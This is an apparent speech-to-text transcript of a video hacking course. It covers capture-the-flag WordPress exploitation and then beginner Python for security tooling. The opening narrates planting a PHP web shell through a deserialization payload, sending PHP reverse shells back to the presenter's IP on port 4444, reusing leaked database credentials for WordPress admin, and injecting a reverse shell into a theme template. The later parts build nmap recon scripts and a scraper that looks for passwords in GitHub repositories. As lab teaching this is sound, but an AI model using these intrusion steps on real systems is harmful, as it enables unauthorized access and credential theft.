this in and now in stead of we can now we can delete this delete this extra line here and up here we're going to say mine equals new and then I'll just copy this so I don't have any typo and this looks like it should work let's try it real quick so we can just say PHP mine.php and it tells us we have a syntax error at the CMD so we'll come back inside here okay and thanks to the magic of video editing and much debugging here I finally got this to work I had in here I had left in here the public function to update the database and I had spelled serialized wrong which took a little while for me to figure out what was wrong but now we get this output and this looks really familiar with what we have just went through with our JWT tokens so now if we now if we copy this string right here and we come back to our page we should be able to enter it in right here and pull down a web shell so if you remember from this right here we have this a repo being called so we can come over here and we can add this in by deleting the back add in a parameter and we can say a repo equals and then paste in the serialized object that we just made it tells us that it has added it and now we should be able to come to our CMD and see if we have code execution on the box so let's give this a try delete all of that and say what did we name I think we named it mine.php so we named it phone.php so we can come up here and we can say pone.php CMD equals who am I and it tells us we are WWE data so now we should be able to get a reverse shell on this so we can come back to our reverse shell cheat sheet since we know this is running PHP we can try this with a PHP we can paste this in my IP address is 10 10 14. 7 and we'll go on Port 4444 and we'll go Ben Bash and we can set up a netcat listener just like this and we're also going to grab this in burp just in case it doesn't work we'll send to repeater we can turn that off and it doesn't work so we can come back to burp here and if we send it tells us that it went through really quickly and it turns out that I am Dash seven and we send it and we get a call back so I had my IP address wrong that entire time that I was trying to get that to work so now I actually want to go back and try my PHP shell and see if that works where is my PHP come back over here paste that in one two three four this is a seven 14 10 grab all of this URL encoded kill this shell try a new one send and the php1 works also so that was a bit of a workaround but I think it'll be helpful for you to see one more WordPress box just to see that the enumeration process for WordPress is going to be a little different and know that you're going to be looking at everything in PHP so I wanted to show you this one because it just came off of what we saw with a serialized object like this and I thought it would be helpful for you to see a little bit of code outside of I thought it'd be helpful to see how it would work with WordPress with PHP and with that we will go ahead and attack another WordPress box okay so I've gone ahead and ran an nmap scan and remember if you run an nmap scan to do so just on the common ports or the most common ports because you were at Target if you were doing a bug bounty hunt you don't really want to just be banging on their door looking for a bunch of open ports but if you're doing a penetration test or some kind of CTF then you can scan all ports I've scanned all ports here but just remember if you're bug bounty hunting to only scan the common ports and if you are scanning quite a few ports maybe slow down the nmap scan with that said we have a three ports open port 22 which is SSH Port 80 HTTP and then we have my SQL running on at 3306. so the first thing to do is just come out to the HTTP server and see what is here and it tells us that we have it says there's an issue tracking until it's set up we can check out these links right here and see if they take us anywhere and it tells us right here it's taking us to spectra.htb so we probably need to add this to our host file so we can sudo geedit Sudo G edit our Etsy host and now that that's added we can try and come back here and see if this will load for us and go and see if we get anything different this time and it looks like it's working I must have spelled it wrong so it tells us there's an error establishing a connection a database connection so that doesn't work did we test this one and we get a WordPress site right here and this is a basic WordPress site we are told that it is up to date it's powered by WordPress and one of the things to look at is there is a user which would be administrator see who commented and we don't have anything it just says a WordPress commentator so there's probably not another user there we have this right here this P1 it looks like that could potentially be different users so you could come up here and just try and enumerate this it'd be easier to send this over to burp and try and do this now it says we have page IDs we can look for different pages but I'm not going to run down this road just yet while we're on a WordPress page one of the best things to do really on any kind of page is to fuzz it so we will do two different types of fuzzing we will fuzz with the extension PHP because we are on a WordPress page so we can come back over here and it is 229 and we can run this actually I'm not sure that will work because we are on a virtual host we'll go spe Spectra Dot htb and see if that fuzzes and it says that's working so we have this Main and then also I want to run F and see if we can pull down anything else right here on this server we actually want to run this on spectra.htb and we've pulled down Main and testing so we can come over here and we can just type in testing and we are brought to a bunch of files we've already been to index.php one of the things you should always check for when you come to a page like this when you see these config files config is always a very yummy place to search for vulnerabilities we can use page Source we know that when we see a blank page that there might be some hidden files and over here we see we have a database user and we have the database username now we saw that on this nmap scan the MySQL was open and you could try to log into my SQL and the way we would go about this is typing in my SQL and we'll put in the host 10 10 10 2 2 9. and then the username was right here devtest so we would go Dev test and then we could for our password and then see what happens like this we can copy paste and see if it will let us log in and it tells us we're not allowed to log in and it looks like it's because of our IP address here is not allowed to log in which is fine you probably have to be running on the local machine to log in so what we can do is we can actually come back to this page right here and we see that your the admin is allowed to log in so we have a WP admin so we can open a new file type in spectra.htp come back over here we can try and log in with the WordPress Dash admin and that keeps sending me to and every time we type in this WP slash admin it keeps sending us to Google so we're going to turn this off we're going to come over here and say about config except the risk and we're going to go a keyword and we're going to set this to a false now that should be saved you can close out of it now if we come back and we type this in it should stay on track WP admin and it loads for us now if you remember we saw I think it was administrator like this and then we can grab this password and see if maybe this person is reusing a password log in and it tells us that the administrator email verification we can just say remind later we don't need to mess with that and it allows us to log in even though it didn't load very pretty we can try again and since that's not working that's fine the way you're going to see this on ctfs a lot and you will see this in the future is to come to the themes right here and we really need this to load for us and it loads for us and now we can come to well that loads there is one thing that you should always look to run on WordPress sides what on WordPress sites and that is a WP scan so we can go at WP scan and then we would run dash dash URL and then on this box we would run the Box name and the page was main so this is going to look for the plugins because sometimes there are vulnerable plugins on these WordPress boxes especially if they don't update them so it would look like this aggressive Dash numerate and then we want all plugins so if we were to run this it would look like this and the reason you would need to run this plugins detection aggressive is because we wanted to enumerate all the plugins not just the ones that it finds in the source code so if you're ever up against a WordPress box especially in a CTF this is something you would want to run but now that this has loaded we can come over to our themes and look inside of the PHP code right here inside the 404 template.php and we can actually add in a reverse shell right here so we've seen this earlier in the course we can go the pH p h p reverse shell and then we can find pen test monkey and just grab this entire web shell or this entire shell and we can just edit the IP address and the port number so we'll go to the reverse shell go Raw command a command C um back to this spot where we were we can just paste all of that in come all the way up to the top change our IP address to 10 10 14 7 and we'll listen on Port four four four four four we can update this make sure we have see if we can start up a netcat listener listening and it tells us this right here updated successfully so we can come back to whatever page that was that we were just on this one right here now if we delete this and we just run this it should execute that code for us that we just saved says that it has updated successfully make sure we have the poor and IP number right it is and we got the reverse shell back over here so who am I and we are finally on this box sorry for a bit of the workaround but this is just really the life of doing any kind of hacking it is going to be a lot of trial and error and fixing mistakes so this is WordPress so these were a couple of Wordpress boxes you're going to see WordPress in the future especially in the world of bug bounty hunting WordPress is really popular and this is just a few different ways to go about hacking WordPress sites so with that we will continue on comes next is usually the question of what kind of programming do I need to know so in this video what we're going to cover is the python that I think you need to know as you're entering into cyber security this is an introductory course into python for the purpose of cyber security I have tried to keep it as streamlined as possible to keep you away from having to watch a six hour course on python for cyber security that is just full of stuff that I think you're not really going to need in the future so this is a beginner course and if you have any questions as you're going through it please leave some questions down in the comments excited to go ahead and show you guys how to install pycharm on your Linux VM if you have a Mac or Windows it's really straightforward you just go to the jetbrains that you download pycharm I'll have this link in the description and you'll click Windows Mac or Linux and then you'll just hit download and it will automatically start to download unless you're on Linux so I I have had to do this for several virtual machines that I've had it won't download and so what you have to do is right click the direct link and you'll copy link then you will you will go to your terminal and you'll run a wget wherever you want this file to be saved so if you want its own pycharm folder put it in its own a pycharm folder for me it is in my downloads and you can save it wherever you want you'll hit enter this might take a little bit depending on your speed that you your internet speed and then you're going to unzip it wherever you downloaded it with this Command right here and then it will unzip a bunch of files will come out and then you will be able to CD in to the folder so for me I will CD into my downloads because that's where it is and then I'll go into pycharm and then I'll LS inside here and I'll go into my bin and then this is the executable I want to launch in order to launch pycharm so I will type in bash and then I will type in pycharm.sh and it will automatically launch pycharm for me so this is how you get pycharm on Linux if you are wanting it on your Linux I usually write everything on my Mac and then if I need to run the code over on Linux I will pull it over to my Linux machine and run it over here so with that we will get started in the next section all right we are ready to start our python course so we're going to start out very simply with a string a string is a sentence that is a data type so we're going to have several different data types coming up but a string looks very simple it is what I think of as a sentence in English so you just have hello world a string is always going to be stored inside of quotations so if we were to print this it would print right here hello world for us and if we change it it's going to change along with us so this is really simply this is a string and we can store strings inside variables which is going to be coming up in the next section but first before we go on you will see sometimes that you need a string on a new line especially if you're going to export something into a CSV file you're going to want things on new lines and at the end of your string you can type something like this and then say hello world number two and then we can print this and we have hello world and hello world number two and if I wanted to get rid of that space I would do it this way so we have hello world and hello world number two another way to go about printing this would be like this so print and then we put our quotations and we say hello and then we can add this like this hello world just like that and now if we were to print it we have Hello World hello world number two and then hello world you see how there's no space right here this is something that I run into regularly and I just had it happen the other day there's two different ways you can put a space right here and I'm going to show you the easiest way first is just add space right there rerun it and now you have a space but I think it's helpful to know more than one way to do this so you can add another quotation and put a space in there and add another plus sign so you can run it this way and you still have that space and it's really important to know this right here because sometimes you'll be running a for Loop and everything is just smashed together and you want a space in there and you can add spaces simply just by doing this so what I'm showing you right now you may be thinking this is not ever going to be helpful and it I wouldn't be showing it to you if this wasn't helpful and it's something you're going to run into in the future so this is a very streamlined course and I'm showing you just what you need to know in the world of cyber security now we're going to be covering something called a variable and a variable holds the place of some kind of data that we're going to want to use later so we'll go ahead and comment this out and on a Mac it is command and then question mark and so we'll comment that out so now if we run our program there's no output and we're going to look at a variable so a variable can be something like this name and then the name Jim this name is going to hold whatever is right here so this is our variable which is going to represent the name Jim so if we come down here and we print and then we type in name and then we run this it's going to print what is stored inside this variable when we look at variables one of the things you're going to want to be able to do especially in the world of cyber security if you ever want to write your own tool is you're going to be saving variables only they're going to be input variables so if we were to go like this and we say name equals input and then we type what is your name and then we'll want a space right here so when we type in the prompt it has a space we'll comment this out and then we'll print name so we're going to print the variable whatever the user inputs here so now we can say what is your name and we can say Tom and when we hit enter it prints Tom and there's something else that's really cool that I use all the time it's called an F string and what you do is you add an F at the beginning of your string but you can print variables inside your string so we'll go ahead and put name inside here and so we can say hello and then the name so we'll say run this what is your name Tim and it puts out hello Tim so this is an F string this is something you're going to want to know this is something I use all the time and in the next coming up videos we're going to look at data types and how we can pull information out of a specific string and this comes becomes really useful whenever you run a script on a victim machine or on your target machine or your target server you'll you may get a lot of output that you don't really need and this is a good way to start extracting data so we'll start that here in just a moment okay it is time to draw out some information from our string so what we can do here is we can save a variable and we'll call this variable name and we can put inside of our name Tommy so we have Tommy here and let's say we want to grab just this m right here what we can do with this is we can say print we want to print our name and then we add some square brackets just like this and when you're running python it always starts at zero so it goes zero one two and so that first m is going to be 2 just like this and so if we run this it's going to print that in for us and just to show you if we want to print the T we would enter a 0 here and this is one of the most basic ways to draw out information and it's going to get a lot more complex as we go but this is what the square brackets do when you see them and when we start to tackle lists and arrays these square brackets become a really useful tool to remember so as we continue to go through this I want to pause right here and I want you to go ahead and play around in your own text editor and print some make some print statements make them on new lines add in some spaces make some inputs and actually practice gathering information and maybe have two or three inputs and have it print things back and forth and you have a little conversation with your text editor so I'm going to go ahead and give you this challenge for you to go ahead and play around with the things you've learned so far and try and really ingrain this information into your mind these are the foundations of Python Programming and you need to know and understand how they work you're going to notice is you can name variables whatever you want and I name my variables really poorly mostly because the programs I write I write for myself and I am not working with a team of developers but maybe you will someday and when you name your variables you can name them whatever you want and you'll want to make them names so other people can understand what is going on so if you look at some of the code I've written in past videos I do this right here I name everything like this and it is not really the best way to go about naming these so I'll name one a guy one and I'll go guy two and he'll equal Bob and then I'll come down here and I'll print a guide to and then I run this and then I have Tim and Bob you can you can name variables whatever you want literally you can go whatever I want and you can make this a variable and then you can come down here and you can print whatever you want right there and you can name variables whatever you want so I would recommend getting in a good habit of making your variables something that you can recognize and it's a very bad habit that I have because I make my variables so that people cannot read what I have done so this is something I'm trying to get better at but I probably won't because this is a bad habit that has formed over many years but I want you to have a good habit of naming your variables something that you can understand and other peoples can understand so as you go through and work through your challenge try to name your variables different things that you will be able to understand in six months after you have written a program and you need to go back and edit it okay I have created this a little challenge here for you if you want you can go ahead and pause the video and open up your text editor and see if you can create this little program right here so we want to one create an input with a greeting so just say hello what is your favorite food let them put it in and then take another input and say what is your favorite hobby and store that also in a variable and then we're going to print with an F string their favorite food and their hobby so if you want to give this a go you can go ahead and give it a try if not we will start it now so we're going to start out with create an input with a greeting so we'll just say print hello and then we're going to take an input but we got to save it as a variable so we'll save this as food and it's going to equal an input and ins where inside the input we're going to have the question what is your favorite food question mark space I see that we have a typo here on all three and then that's going to be saved as their food then we're going to say input and this is going to be we'll just save this as Hobby and we're going to take in input and we're going to say what is your favorite hobby question mark space and then we're going to print with an F string all of this together and we'll say print your favorite food is and then if you remember we need our F string here and we should grab our curly braces and say food and your favorite hobby is curly braces Hobby now when we run this if we did everything right it should print for us this final statement after we give these inputs so we say run and it says hello what is your favorite food and we'll just say chips what is your favorite hobby running and it says your favorite food is chips and your favorite hobby is running so this is a simple input form and it's going to print out with our variables that we have stored and this is a good practice because when you write a program for a tool maybe that you develop in the future you are going to want to know how to do inputs so that way you can take the input save it in a variable and then later do something with it so later on in the course I'm going to give you a practical example of taking input and then running it in a program that is really helpful and I will cover that when we are ready for it all right so we have covered the string so far this integer is a whole number so if we say int we have a number of seven floats we're not really going to use these a whole lot in the world of cyber security they have a point within the number so 3.14 would be an example of a float to date I cannot remember a single time I have used a float in cyber security usually that's more towards a data science or something of that nature a Boolean is a true false you will want to remember Boolean we'll cover these a bit in the future when we do our while Loops we'll be using the true false so these are some of the different data types and just to get an idea of what these look like if we save a variable and we make it a float and we say like one two three and then we print this it will tell us what we have so we can come down here and we can say print and then we can put type and then we can put in our variable and when we run this it will tell us that we have a float and if we put in an integer it will tell us that we have an integer and then so on and so forth we can do this with an A and then we can also do this with a string and we can hit run and it tells us we have a string sometimes we will do something like this and then we have this saved as a string here and then when we go to add this to something else we can get an error and it's because we have a string and we'll be trying to add together a string and a integer and it won't work so we'll go variable two equals 3 and then when we say variable three equals variable one plus variable two and we're going to get an error and it's going to tell us that you can you can't add these together so this is one version of how these matter another version of this is let's say we want to print and we say we have an integer right here and we want to add it to a string and we can go like this and we say 70. what do you think is going to happen it tells us we can't add these together but if we take this and we turn this into an integer what will happen now now it works so this is the difference so this is an integer this is a string unless we declare it to be an integer and you can do the same thing with floats so I'm not going to cover those and then what happens if we do this right here what do you think the output will be and the answer is 70 70. so this is the difference between integers and strings and how they work with numbers and data so if we wanted to we can turn both of these into integers and this is the last example I promise I don't want to abort you with adding these together and then we say enter and we're back to 140. so this is a little bit of strings integers and booleans and we'll kind of skip floats because I don't think we'll really need them but it's worth mentioning so you know they're here and with that we will continue on with our next challenge okay so we have these numbers here number one two three four five saved as num1 and then num2 and then num3 what I want you to do is to write this to your console or write this to your text editor and then I want you to add this variable plus this variable and see what the output is and then I want you to take the second number in num1 so it would be this 2 right here and I want you to add it to the second number in num3 which is this seven so your output should be nine I want to see if you can figure that out and then the third challenge is to take num2 and change it change num2 into a float and print the type to the console so that way the console tells us that it is a float so if you'd like to go ahead and pause and give this a try you can do that now or we will go ahead and Tackle this right now together so what we are going to do just first is we're just going to print and we're going to say we're going to turn this into an integer and we're going to go and write in num1 and then we'll add this as an integer and then we will say num2 and this needs to be closed off or we are we will get an error and this should print it for us so it tells us here is the total if we add those together and then the second challenge is to add the second number so we'll just take this just a heads up copy and paste and programming is always a bad idea because if I have a bug here I just now copied and pasted it and I have two of them but what we're going to do is we're going to take this and we're going to put in our square brackets and if you remember it says 0 1 so we're going to say one and then we're going to say one I guess I didn't really need this and then we'll print this and our output is nine so now we've grabbed the second numbers and then our third challenge is to change number two into a float so that it prints float so what we want to do here is just say print and then we're going to tell it we want a type and we want to print out the type of num2 and then above that we're going to just type in num2 you can do this two different ways I'm going to do it this way I'm going to say num2 equals num2 and we'll just go like this and we'll type float and we'll close this off and now if we print this it tells us it is a float and we will continue on with our python course in the next section okay we are going to do a walkthrough of if elif and else statements so this is the instructions for the little program I'm going to write but when I finish this program I'm going to give you a challenge to do something similar on your own so I'm only going to give one example that you're and you're going to need to pay attention and maybe watch this walk through twice and then go on and try the challenge so the first thing we're going to do is if you are under five you are a kid so our if statement is going to first need an input from the user that is going to tell us what is their age so we'll just say we have a variable and we want it to be an integer and integer and we want an input and we're going to ask them what is your age question mark space and we have to have that space otherwise it's really ugly in the terminal and then we're going to start our if statement so we're going to say if a u this person's their input which is their variable is less than the age of five then we want it to print that they are a kid so we'll print you are a kid now one thing we want to do is if they hit the age of five we'll need an equal sign here otherwise I'll just show you if we say we'll need an else statement so this doesn't air out actually we'll just let it air out we'll say what is your age and they say five and we get no output because they this doesn't include five remembering that the computer starts at zero and then it's going to stop at four so if we want to include five in as your as a kid we'll need that the variable is less than or equal to a five now if we put the five in here it will print for us you are a kid so what we we need to do next is we're going to type in l if because we're going to make an alif statement and we're going to say the variable is less than 15 and the reason we don't have to worry about anything under a 5 is because it will catch this if statement and then this whole program we write after this will stop and the computer will actually skip it so we don't need to worry about adding anything else in here and we can say actually if you are less than or equal to 15 then we are going to print you are a big kid and then for the final alif llif we will say the variable and we will say if it is greater than or equal to 21 and that's ugly and we will say print and we're going to print U r a bigger kid and now we're going to put in an else statement an NRL statement we're going to print anything that's over 21 we're just going to print you are old so now if we run this and we rerun the program we run it and we say how old are you and we say three we get your kid if we say 13 we get your big kid if we say 18 we see you're a bigger kid and if we say you are 44 we get you are old now because we're going to be using this as a tool for us to be able to write tools and modify tools I'm not going to cover this because I think that it's not really necessary for cyber security but if somebody were to run this and they put in the letter A the letter A it's going to crash our program because the letter A that is not a number it's not an integer so what we'd have to do is we would have to make this so that if they if they put this in and it was an a it would print enter a number and then rerun but we're not going to do that because it's not really necessary for cyber security it's just something to be aware about now what's coming up is your challenge let me delete all this and I will write up your challenge for you in the next section your challenge here is to take the temperature from the user and then tell them if it is less than 20 degrees you need boots and this is from the US so I'm running in Fahrenheit not Celsius and if it's less than 30 you will need a coat if it's less than 70 you will need a jacket if it's over 70 it is nice outside so take this input or take this information and make a program with if elif and else statements okay so here is how I would go about doing this I would take and input and it will say what is the temp outside and this is this will need to be an integer because we're going to be preparing this as a number so we'll say if VAR is less than 20 then we're going to print you need boots and we'll say alif bar is less than 30. print you need a coat and then we're going to use one more lift here a lift VAR is less than 70 rent U Need a jacket and then finally we'll do else and it's above 70 then it's nice out and we don't actually need to put anything in there because this is an else statement so everything that's above 70 will automatically print it is nice outside so when we run this if we put 12 we need boots if it's 22 we need a coat and if it is 65 we need a jacket and if it's 85 in my opinion it's perfect outside so this is the if and alif and the else statements we're going to be moving into four loops and later we're going to look at nested if statements and they'll look something like this if it's less than 20 and then we can say if it is if VAR is less than we'll say it's actually it's greater than 25 then we can print you need boots and then we'll print something like gloves so nested if statements look something like this and you can have nested if statements just so you're aware of it so if we say it's 26 it it will oh because we're hitting this one we'll hit we'll say this is 15. so if we say that the temperature is 16 we hit you need gloves and you will need boots so this is a nested if statement uh we'll cover these a little more in the future I don't know how much you will need these nested if statements I use them every now and then so it's nice to know that you can run nested if statements but for now we're going to move on to our for Loops before we get into for Loops too far I want to show you why for Loops are important and I also want to show you why lists are important which we're going to be going over here in just a minute after we get the basic understanding of a for Loop so this is a program I've shown it before it don't worry about what it looks like it looks kind of complicated but it's really not what happens is you put in a repo that you would like to Target on GitHub to go and search for all of the usernames passwords and files that just shouldn't be made to public so in this case it's looking for pass for passwords on GitHub but what we have down here is a for Loop so this for Loop right here we have an empty list which we're going to cover in a second and it goes out to GitHub well right here and it will go through all these links everything you can click on and it's going to narrow it all the way down to the repositories and it will click this link and then it will click to it'll click the file and then it will click the raw then it copies this entire thing and it puts it into a text it puts it into a CSV file and then checks for the word password so that's the program itself but what's important to remember is what happens is it goes out and it pulls all the links and puts them in a list then it goes through this for Loop and it puts takes all of these and it says four every one of these items that is inside of the links which is actually this variable that I have up top it's going to do something so for Loops are very important you can see I have another one right here so for Loops we are going to need them lists you are going to need them as well and I just wanted to show you this because sometimes what happens is you be going through trying to learn something and I'm showing you something very Elementary and you are like why why do I need to know a program that tells me to put on a jacket this is all building up to something that is going to be able to help you build tools and more specifically if you're new just be able to read through exploits and be able to edit them because you're going to need to know how to read Python and edit exploits as you grow in the world of cyber security so here is a very basic for Loop and I'm going to show you it in a string because we've already covered strings and what this all this does is we have our variable string right here that is holding the hello world and so the way the for Loop works is it says 4 I in string so this I right here is going to be another variable that holds one letter each time the for Loop runs this I is going to represent one letter and in a list it's going to represent each item in the list so this will run I'm gonna run it so you can see what this looks like the way it runs is it goes for I in string so it's going to grab the first letter which is going to be the H and then it prints it but the for Loop is not over so it runs the loop again and it'll grab the E and it'll print just the E on a new line and then it goes through through and it runs every single time until it is out of things to run and then it closes the loop so this is how for loops work I'd like for you to go ahead and write out your own for Loop and maybe put something different in here and try to get an understanding of how it works and if we wanted this to print all of this together you would have to store this into a new variable and then print it outside the for Loop down here like this and this is where we would print our new variable and we're going to cover this in lists because this is something that you will need to do in the future so go ahead play around with the for Loop right one get an understanding of how it works if this doesn't make sense re-watch it and hopefully it makes sense I know after teaching for Loops to several different students that for Loop sometimes can be hard to understand but they are really useful and something you need to learn so we're going to be covering lists in the next section going to be looking at lists and a list is something that is going to be useful because we're going to be appending to lists all the time within our for Loops so a list can look like this my list equals square bracket and lists always go inside of square brackets and we can say item one and then comma item two and then we can do an item three so we have our list here and if we want to run a for Loop through this list we will say for i n my list print I and now if we run this it will run item one item two item three so this is a list we will be using these in the coming lessons and they will be helpful for you in the future as you've seen in this program I have two lists right here and they are used regularly to append to so list is something you will need to know so go ahead make your own list and see if you can Loop through your list and maybe try and just print something like this later just print the item two so you'll have item one two a three and then print number two and see if you can remember how to do that if you have forgotten it would look something like this print and then we can say my list and then we can put this in square brackets and we'd say 0 1 and then we have a one and now we can print this and we have one two three two so that is going to be it for the list we're going to move on and we're going to start using lists in a more comprehensive manner so we're going to try a while loop now and the way we're going to do a while loop is by using a Boolean I like to set a variable and then set it to true and then at the end of the while loop I will set it to false so the way this works is make a variable and we'll just say variable actually we'll name it on that's a good way to name the variable and we'll say on equals true and then we'll say while on and we'll make a variable and we'll just call it variable because I don't know what to name it and we will take an input and we will say continue running while loop and then we will put y we'll we'll put a y or a no so would you like the while loop to continue yes or no and then we can say that we can go do something like this and then we can set a variable up here and say I equals zero just so you can see how many times this is running and then we'll say I plus equals one and then this should just continue to run and then we'll put an if statement say if the variable equals equals n then we'll say that on equals false and this will kill our for Loop so now if we run this it'll say would you continue continue running the while loop and we will say yes yes and then when we say no it'll kill the while loop I forgot to print I forgot to print our I so that we could see this so now we can say would you like to continue yes yes and you can see our variable every time the I the for Loop runs our I gets added to one so our for Loop has run now it says seven times eight times nine ten and then when we're done we can say no and we can end it okay we are going to be starting functions and just to be clear I have not pre-written any of the code we are about to go over or mostly anything we've gone through in this course that's why you've seen me make mistakes and so as we start functions I'm going to try and make this a little more realistic for us so that when we are thinking through functions and writing code in the realm of cyber in the realm of cyber security you can start to get an idea of how this can be used so we're going to start with functions and a function just calls something very specific that we want to happen so we can just say we'll call it my function and then the way your function is going to start is with a def my function and then we close it off like this and then down here we want our function to do something very specific so we can say print and then we can say it worked and the way a function gets called is usually somewhere further down inside the code something happens and it triggers this function back up above it for it to actually do something so what would happen in order to call this is we would just say my function now when we run this when the computer reaches this right here this closing bracket right here I usually like to think of this as the call sign for the function so if we run this it's going to print it worked and this will become more clear as we write more of these but this is the basic concept of functions and one thing we can do with functions is we can pass through variables so we can say something along the lines of I and then we can say I well we'll make it a different variable we'll say variable equals I plus 3 and then we can say print and then we can say we want to print our variable and so in our function we can pass information through like this so when we say of my function we can now say input and then we can say what would you like to add and because this is a string we're going to need to make this into an integer I guess we can go and make it an integer right here and we can say int and then we can close this off now when we run this it's going to ask us what would we like to add and we can say three enter and it will say 3 plus 3 equals six so this is a very basic function so we take some kind of input right here this is where we call our function so now this function is being triggered but we want to pass something into our function some kind of variable or some kind of information that we've grabbed somewhere else and what happens is it can now use this inside the function this you may be thinking like in what case would I possibly ever need to use this and so I'm going to just show you my GitHub dumpster diving tool once again that I've used multiple times on this channel this right here where it's grabbed a repo I call this function and it's going to Loop through to see every single file inside of the repo is it a python file is it a Javascript file is it an XML file and what happens is when I pass this repo through it now is able to use this variable that has come from somewhere else inside this function and then I do the same thing up here I pass through a variable inside of a function so this is really important to know and you will use it and we're going to go ahead and give another example and actually before we give another example I want you to try and write your own function and see if you can get it to take an input so let's take the input and make it the first letter of your name so I'll write out the instructions you want the we'll say first letter of your name and you want to take this as an input so we'll say input and then you want to call a function that adds your first letter to the rest of your name so here's your instructions you're going to make a function and then you're it's going to take a variable and that variable is going to be the first letter of your name and then you are going to add that to the rest of your name so I hope this makes sense and I'll go ahead and walk you through what this would look like so we'll go deaf my function and then we are going to call this function we're going to pass through let's use I as our variable so that stops giving us whenever this is giving us an error and I can't stand looking at it I type in pass and that will not give us there and we'll come back and delete that in a second and we're going to call my function and we're going to take another input and we're going to say what is the first letter of your name question mark now we can delete this and we're going to come back up here and we're going to use this and we're going to say that my function and we're going to take this input and it's going to be a pass through as I and so down here we're just going to say my first name is Ryan so we will say I we'll call it the variable equals I plus and then we can put the rest of this inside of a string and we can say something like this and then we can print our variable so when we run this if I put an r in here it'll print out my name so I hope you're able to figure this out maybe try to come up with another way to write a function and practice writing functions and see if you can get the hang of it and in the next section I'm we're going to go over something that will show you how this can be really helpful in building your own tool okay I hope you have played around with functions and you are now ready to try and become a little more advanced and we're going to try and gear it towards cyber security now and I hope you're familiar with maybe the nmap scan and some other tools so we'll just use an nmap scan right now and we'll just say like we're going to call function and we'll call it in map and this is going to take a variable and we'll actually call it the IP because we're going to take an IP address and the way I like to run my nmap scans is with the they'll look something like this in map Dash a like this and then we're going to pass in the IP address and then I like it to be verbose now in order to get this to run we would have to import a module called OS but we're not ready for that so this is just to show you how the functions will work and so I will wrap this entire thing inside of curly braces oh my God dashes in here that shouldn't be there I don't know why I did that and then we'll wrap this inside curly braces this is not supposed to be inside curly braces that is supposed to be inside of quotes and we'll make this an F string and we'll say our variable equals instead this would be an OS command if we were actually going to run this in our Linux machine or Windows whatever you choose to use as your hacking VM and now what we do is we'd come down here and we would say um something like nmap to call our function and then we're going to take an input and we're going to say what IP would you like to scan and then right here we are going to print running in map scan against and then we will put in the IP address and this will need to be an F string so the way this or sorry that will not be the IP that will be against the variable so it will tell us that it is running the nmap scan right here okay so when we run this we can say what's who would we like to scan against and we'd say 192.168 point something point something else then we run this it'll print running in map scan against and then it gives us the output right here so this would be a way that if you were trying to write your own tool to automate your recon this would be one of those ways you would use a function in order to automate your recon and there's a lot more you can do with this IP address and you could pass it into multiple different tools and then you have written your own tool so this is how we can use functions in cyber security that are really helpful for us and whenever you're going for a certification it'll be really helpful for you to be able to read through functions and maybe modify them especially in exploits because vulnerabilities and exploits change over time and you will need to be able to change and modify different X different exploits that you come across on Google in order to gain access to a machine before we end this course I want to give you a little bit of an introduction into making your own tools and then I want to challenge you to add to this Recon tool that I'm about to show you and you can start to build your own tool for Recon and it'll help you remember the python code that we've gone over so far in this course so I've gone ahead and connected to hack the box and launched the box devel and so I want to just show you what OS system does so we'll import OS system you've seen this before and this is just our operating system it just means we're going to be able to tell our Linux machine to carry out commands the exact same way you would inside of a terminal so we're going to make a function and we're going to call it Recon and we're going to pass through an IP address really if you remember this is just a variable that we're going to be passing through into the function and then we're going to call our function down here and we'll just call it Recon and then we're going to ask for an input and then we're going to say what IP would you like to scan and then we'll put a question mark and a space there so that way it's not all smashed together and now inside of here what we can do to make this program run our Recon and automate it for us is we can type OS system and then we can put in here we're going to make this an F string what we want to do so we're going to run an in-map scan and we're going to run it on all port or we're going to want all outputs we're going to run it on all ports and just in case it is blocking the Ping we'll put the p and you don't have to put this in here it's optional and then we are going to put in the IP address that we run through and I really like to run everything as verbose so this when we run this you'll be able to see It'll say what IP would you like to scan and I'll put in the IP address and it will now start the scan for us so this is the same thing we would see inside the terminal we're going to see Port 80 421 is open and at the end of the scan it will tell us everything that has happened on this scan now you can add to this we'll stop this you can add to this same scan when it gets done running the nmap scan you can come down here and maybe you want to look for different directories and so you could go OS dot system and we're going to make an F string and we can add in maybe we want it to run derb and we want it to run on the same IP address that we've already passed in and it will Now launch this right here as soon as it gets done with nmap and the cool thing about this is if you have your own Recon tool set up you can go ahead and run the program send over the IP address and then you can leave and it will automatically run your recon or maybe while your recon tool is running you can do other more manual enumeration maybe it has Port 80 open and you see that real quick with the nmap scan and you want to start looking at what's on Port 80 and it will run your nmap scan it will run your durbuster for you and maybe you want to run a w fuzz or maybe you want to run a sublister I want you to go ahead and start off with what I have given you right here and you can add to this tool with the information that you have have learned so far okay so in this video we're going to be covering enumerating apis or back-end apis and I see this in bug Bounty program sometimes and I'm sure you guys have come across a page that looks exactly like this you come in you go to the URL and you get some Json in return and I actually was looking through a bug Bounty program just a few days ago and I actually saw it said back end and then API dot the program.com and so if you're new and you're not really sure how to enumerate apis then this video is going to be for you we're going to keep it really short and specific so that way you can go out and do this yourself um we're going to be looking at the box back end on hack the box but we're not actually going to walk through the box all right so I have decided to include this little section here on making a GitHub Recon tool in Python for you because I figured if you have went through my first bug Bounty of course I had this section on the understanding the basics of python and as you become a more well-rounded bug bounty hunter or penetration tester your programming skills are going to improve as well so I decided this tool was easy to make it includes a lot of really easy Concepts within python but it is actually a lot of code I guess if you are a beginner if you're going to continue down the road of penetration testing or bug bounty hunting you're going to want to develop your own tools and have a better understanding of python and I figured this was a really great tool to give you an idea of things you can actually build that are useful and even with this tool you can add on to it and make it your own and give it new functionality so I've decided to include this in here because it will help you and save you time in the future if you decide to continue bug bounty hunting so enjoy this tool and use it well okay so the setup for selenium is going to take a little while and I don't want you just to close out and think this is too hard I want to show you how cool this tool really is so if you follow along with this video in the end you're going to have a program that and you're going to understand all of this code and then you're going to have a program that goes out to GitHub for you and goes through the repos opens all the pages goes through all the links and pulls out if there's any passwords or not stored in the code on the GitHub page and so it will look like this when you run it and it automatically went through all of those links on GitHub it pulled down this page right here it says a password was found at this link and so if we click on this link it'll take us to this page right here and we can look at this and we can go to the raw and we can type in password and right here it tells us it has found password and the password is admin and it found this on this GitHub page so that is where we're going and if this tool looks like something you would like to add into your bug Bounty or penetration testing Arsenal then you can stick around and go through and make this tool with me we start with our program and using selenium there's a few things that you have to do and I'm going to walk you through installing this both on Mac and windows you will need your pycharm editor that we used in the first python for ethical hackers and now you are going to need Google Chrome installed and so I'll have this link link down in the description if you don't have Google Chrome it is best if you use it you can also do it with Firefox but it's really easy if you just download Google 